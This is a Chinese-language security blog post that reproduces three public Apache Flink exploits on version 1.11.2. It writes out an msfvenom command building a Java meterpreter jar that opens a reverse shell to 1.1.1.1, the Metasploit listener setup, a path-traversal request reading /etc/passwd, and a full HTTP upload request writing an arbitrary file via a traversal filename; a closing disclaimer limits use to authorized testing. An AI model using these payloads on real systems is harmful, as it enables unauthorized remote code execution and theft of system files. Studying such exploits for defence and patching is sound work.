Part 01
前言
近日,有安全研究员公开了一个Apache Flink的任意Jar包上传导致远程代码执行的漏洞,影响范围:<= 1.9.1(最新版本) 但是作者通过测试在版本Version: 1.11.2也是受影响的,此次复现就是通过版本Version: 1.11.2进行复现利用。
蹭波热度,发一下已公开Apache Flink漏洞合集。
Part 02
任意jar包上传导致远程代码执行
搭建好靶场就省略了。
打开一个使用 Apache Flink 的网站,直接就未授权了
点击提交新工作
打开MSF 生成一个 jar 木马
msfvenom -p java/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=4444 -f jar > test.jar
点击 Add 上传 jar 文件
监听端口
use exploit/multi/handler
set payload java/shell/reverse_tcp
set lhost 1.1.1.1
set lport 4444
run
点击下 submit
反弹回来一个shell
Part 03
任意文件读取
Poc: /jobmanager/logs/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
直接根目录下访问就行了
Part 04
文件写入
Poc:
POST /jars/upload HTTP/1.1
Host: 1.1.1.1:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
If-Modified-Since: Wed, 06 Jan 2021 03:23:18 GMT
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 185
------WebKitFormBoundaryoZ8meKnrrso89R6Y
Content-Disposition: form-data; name="jarfile"; filename="../../../../../../tmp/success"
success
------WebKitFormBoundaryoZ8meKnrrso89R6Y--
出现400没事,直接访问
http://1.1.1.1:8081/jobmanager/logs/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2ftmp%2fsuccess
Part 05
免责声明
本项目仅进行信息搜集,漏洞探测工作,无漏洞利用、攻击性行为,发文初衷为仅为方便安全人员对授权项目完成测试工作和学习交流使用。请使用者遵守当地相关法律,勿用于非授权测试,勿用于非授权测试,勿用于非授权测试~~(重要的事情说三遍)~~,如作他用所承受的法律责任一概与凌晨安全无关!!!
